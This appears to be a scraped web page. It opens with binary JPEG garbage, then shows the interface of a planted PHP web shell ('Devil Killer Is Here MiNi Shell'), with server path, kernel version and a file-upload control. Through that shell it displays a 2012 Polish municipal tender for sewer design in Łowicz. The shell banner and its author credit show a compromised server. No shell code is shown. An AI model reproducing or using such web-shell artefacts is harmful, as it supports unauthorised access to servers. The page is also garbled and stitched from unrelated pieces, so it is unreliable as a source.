JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120528/117069-N-2012.html

<p class="kh_header"><b>Łowicz: Wykonanie dokumentacji technicznej budowy kanalizacji sanitarnej 
w ulicy Łódzkiej w Łowiczu</b><br>
<b>Numer ogłoszenia: 117069 - 2012; data zamieszczenia: 28.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Łowiczu , Stary Rynek 1, 99-400 Łowicz, woj. łódzkie, tel. 046 830-91-51, faks 046 830-91-60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.um.lowicz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji technicznej budowy kanalizacji sanitarnej 
w ulicy Łódzkiej w Łowiczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie  projektu budowlano-wykonawczego  sieci kanalizacji sanitarnej grawitacyjnej z przyłączami w ul. Łódzkiej i ul. Makowiska w Łowiczu na odcinku od ulicy Łódzkiej 1 i 2a (po obu stronach drogi krajowej nr 14) do końca ulicy i w ulicy Makowiska (do końca posesji), wraz z projektami  przepompowni ścieków - przepompownia żelbetowa wraz z pełnym wyposażeniem i zasilaniem elektrycznym, oraz z zintegrowanym powiadamianiem Zakładu Usług Komunalnych. Zamawiający proponuje włączenie projektowanej kanalizacji do kanalizacji sanitarnej znajdującej się na początku ulicy Łódzkiej lub do projektowanej kanalizacji w głębi działki Łódzka 46.    
Zakres zamówienia obejmuje:
- Przebieg trasy kanalizacji sanitarnej winien być zaprojektowany w działkach poza zabudowaniami i uwzględniać tendencję dalszej zabudowy i istniejącego planu miejscowego.   W przypadku sąsiadującej zabudowy, a także konieczności zaprojektowania trasy w drogach sieć kanalizacji sanitarnej należy zaprojektować do granicy działki zabudowanej.
- pozyskanie map do celów projektowych 
- uzyskanie kompletu oświadczeń właścicieli nieruchomości objętych projektem                            o zaakceptowaniu trasy kanalizacji oraz zgodzie na wejście na teren posesji późniejszemu wykonawcy inwestycji (na druku stanowiącym załącznik do umowy),
- uzyskanie kompletu wypisów z rejestru ewidencji gruntów oraz wyrysów z map ewidencyjnych dla obszaru objętego zadaniem
- w przypadku kolizji z istniejącym uzbrojeniem - uzyskanie stosownego uzgodnienia proponowanego rozwiązania projektowego z właściwym zarządcą sieci,
- uzyskanie decyzji właściwego zarządcy drogi o uzgodnieniu przebiegu kanalizacji w pasie drogowym lub w jezdni wraz z wymaganymi przez tych zarządców projektami branżowymi,
- skompletowanie wszelkich niezbędnych materiałów w tym wypisu i wyrysu z miejscowego planu zagospodarowania przestrzennego miasta Łowicza oraz uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego na część inwestycji nie objętej planem 
- przygotowanie informacji o planowanym przedsięwzięciu do zapytania o zakres raportu, oraz
opracowanie raportu o oddziaływaniu przedsięwzięcia na środowisko, jeśli będzie wymagany,
- skompletowanie wszelkich niezbędnych materiałów, opinii, uzgodnień oraz uzyskanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
- opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia, w przypadku gdy jej opracowanie jest wymagane odrębnymi przepisami,
- opracowanie specyfikacji technicznych wykonania i odbioru robót,
- uzyskanie w imieniu Zamawiającego pozwolenia wodno-prawnego, jeśli będzie wymagane,
- skompletowanie wszelkich niezbędnych materiałów wraz z opracowaniem wniosku o uzyskanie decyzji pozwolenia na budowę dla zadania objętego postępowaniem przetargowym
UWAGA: Projekt techniczny zawierać powinien opracowany w skali 1:500 plan sytuacyjny z naniesionym przebiegiem sieci kanalizacyjnej, z uwidocznionym podziałem na sekcje mapowe wchodzące w skład dokumentacji.
Projekt opracowany powinien być z należytą starannością, zgodnie ze współczesną wiedzą techniczną, z zachowaniem obowiązujących przepisów, norm i warunków technicznych.
Wykonawca zobowiązany jest do bezpłatnego udzielania Zamawiającemu odpowiedzi i wyjaśnień na zapytania Wykonawców w toku postępowania o udzielenie zamówienia publicznego na roboty budowlane, stanowiącego przedmiot niniejszego zamówienia
W przypadku braku możliwości realizacji inwestycji zgodnie z projektem z powodu jego wad i błędów kosztorysowych, projektant zobowiązany jest uzupełnić projekt nieodpłatnie i pokryć koszty robót budowlanych jako dodatkowych i niezbędnych do wykonania.
Projekt winien być uzgodniony z przyszłym użytkownikiem tj. Zakładem Usług Komunalnych w Łowiczu ul. Armii Krajowej 2b, 99-400 Łowicz.  
Dokumentacja techniczna winna składać się z:
- dokumentacja projektowa z podziałem na branże (w tym projekt budowlano wykonawczy)
- po 6 egz. Po uprzednim zatwierdzeniu przez Zamawiającego wstępnych założeń projektowych. W razie potrzeby obowiązkiem Wykonawcy będzie uzupełnić dokumentację szczegółowymi projektami wykonawczymi umożliwiającymi wykonanie robót budowlanych bez konieczności dodatkowych opracowań.
- przedmiar robót - opracowanie zawierające opis robót budowlanych w kolejności technologicznej ich wykonania z podaniem ilości jednostek przedmiarowych robót wynikających z dokumentacji projektowej oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych zgodnie z treścią rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r, (Dz.U.Nr 202, poz. 2072) - po 2 egz. dla każdej z branż
- kosztorys inwestorski - opracowane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie metod i podstaw sporządzania kosztorysu inwestorskiego (D.U. Nr 130, poz. 1389 z 2004r.) - po 2 egz. dla każdej z branż
- specyfikacja techniczna wykonania i odbioru robót- zbiory wymagań w zakresie sposobu wykonania robót budowlanych, właściwości stosowanych materiałów, sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót, użytego sprzętu oraz zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiarowych - 2 egz.
- Wykonawca w dokumentacji projektowo-kosztorysowej nie może wskazywać znaków towarowych, lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i jednocześnie, gdy nie może użyć w opisie dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważne. W/w przypadku zastosowania stwierdzenia lub równoważne Wykonawca zobowiązany jest określić cechy (kryteria, parametry) równoważności. Przy sporządzaniu dokumentacji projektowo-kosztorysowej Wykonawca zobowiązany jest do stosowania przepisów ustawy Prawo zamówień publicznych w zakresie opisu przedmiotu zamówienia zgodnie z art. 29 ust. 3 ustawy Pzp.
- Sporządzenie wyrysów i wypisów z rejestru gruntu w rozbiciu na :
- parcele objęte inwestycją
- uzyskanie zgód właścicieli działek na wejście w teren zarówno dla trasy kanalizacji jak
i urządzeń (np. tłocznie, studnie kanalizacyjne itp.), Zamawiający żądał będzie podpisu właścicieli nieruchomości na podkładzie mapowym z naniesioną trasą i urządzeniami, w celu podpisania umowy na ustanowienie służebności przesyłu i wyceny wysokości odszkodowania za umieszczenie urządzeń do przesyłu oraz strat roślinności i naniesień na działce wycenionych przez biegłego rzeczoznawcę  
- opracowanie materiałów niezbędnych do uzyskania decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia zgodnie z obowiązującymi w tym zakresie przepisami,
- sporządzenie dokumentacji projektowej w wersji elektronicznej obejmujący projekt budowlano wykonawczy, specyfikacje techniczne warunków wykonania i odbioru robót oraz przedmiary robót w postaci edytowanych plików dla całości projektu w tym pliki PDF dla potrzeb przetargu na roboty budowlane szt. 2.
- wykonawca zobowiązany jest do uzyskania wszystkich wymaganych uzgodnień, pozwoleń i decyzji niezbędnych do uzyskania pozwolenia na budowę
- oraz wykonanie innych prac i robót niezbędnych do należytego wykonania.
Dokumentacja projektowa musi być rozdzielona w następujący sposób:
- część obejmująca drogę krajową nr 14 - pozwolenie wydaje Wojewoda Łódzki
- cześć obejmująca tereny miejskie - pozwolenie wydaje Starosta Łowicki.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.32.22.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający działając na podstawie art. 45 ust. 2 ustawy, wymaga wniesienia wadium.
1. Wykonawcy zobowiązani są wnieść przed terminem składania ofert wadium.
     Zamawiający określa wadium  w wysokości 2 000,00 zł, które należy wpłacić do dnia  12.06.2012 roku do godziny 10.00 w wybranej postaci określonej w art. 45 ust 6 ustawy.
2. W przypadku wniesienia wadium w pieniądzu należy dokonać wpłaty przelewem na konto Zamawiającego: Urzędu Miejskiego w Łowiczu Nr 81/1500/1689/1216/8005/0182/0000 Kredyt Bank o/Skierniewice, filia nr 5 w Łowiczu ul. Podrzeczna 14. Na dowodzie wpłacenia wadium należy zamieścić informację jakiego przetargu wadium dotyczy oraz wskazać przedmiot zamówienia.
3. W przypadku wniesienia wadium w innej formie dowód wniesienia wadium musi być złożony wraz z ofertą w oddzielnej kopercie z informacją dotyczącą sposobu jego zwrotu, natomiast potwierdzona za zgodność z oryginałem kopia musi być załączona (wpięta) do oferty.
4. Za chwilę faktycznego przekazania wadium w przypadku wnoszenia wadium w postaci pieniężnej uznaje się chwilę uznania konta Zamawiającego, a nie zaś chwilę obciążenia rachunku Wykonawcy.
5.Wadium wniesione w formie gwarancji bankowej lub ubezpieczeniowej, musi gwarantować Beneficjentowi zapłatę sumy gwarancyjnej jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw. 
6. Zgoda Wykonawcy na przedłużenie związania z ofertą jest związana z wyrażeniem zgody na przedłużenie okresu ważności wadium - gdyby przedłużenie okresu wartości wadium nie było możliwe Wykonawca zobowiązany jest wnieść nowe wadium na przedłużenie okresu związania z ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia, Zamawiający uzna powyższy warunek za spełniony w przypadku  Wykonawców, którzy wykonali w okresie ostatnich  trzech lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, dwóch prac projektowych z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie. Zakresem niezbędnym do wykazania spełnienia warunku wiedzy i
doświadczenia są wykonane  projekty kanalizacji sanitarnej lub wodociągowej -przynajmniej jedna o wartości brutto nie mniejszej niż 50 000zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; Zamawiający uzna powyższy warunek za spełniony w przypadku wykonawców którzy oświadczą iż dysponują, w celu wykonania zamówienia, osobami posiadającymi uprawnienia do projektowania w specjalności niezbędnej do wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>sytuacji ekonomicznej i finansowej, Zamawiający uzna powyższy warunek za spełniony w przypadku Wykonawców, którzy są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia od jednego zdarzenia jak i do wszystkich zdarzeń na kwotę nie mniejszą niż  100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie iż wyraża zgodę na realizację płatności wynagrodzenia za wykonany przedmiot umowy  w terminie 30 dni od daty jej otrzymania w następujący sposób: 
-pierwszej faktury częściowej po wykonaniu map do celów projektowych i koncepcji przebiegu trasy kanalizacji sanitarnej,  20% wartości przedmiotu zamówienia ich odbiorze na podstawie odpowiednio częściowego bezusterkowego protokołu odbioru dokumentacji, podpisanego przez  Zamawiającego, 
-drugiej faktury częściowej po wykonaniu całości dokumentacji i złożeniu jej u Zamawiającego  50 % wartości przedmiotu zamówienia ich odbiorze na podstawie odpowiednio częściowego bezusterkowego protokołu odbioru dokumentacji, podpisanego przez Zamawiającego, 
-trzeciej faktury końcowej po uzyskaniu przez Zamawiającego prawomocnego pozwolenia na budowę - 30% wartości zamówienia na podstawie odpowiednio końcowego bezusterkowego protokołu odbioru dokumentacji, podpisanego przez  Zamawiającego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lowicz.eu/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łowiczu Stary Rynek 1, 99-400 Łowicz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2012 godzina 10:00, miejsce: Urząd Miejski w Łowiczu Stary Rynek 1, 99-400 Łowicz - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com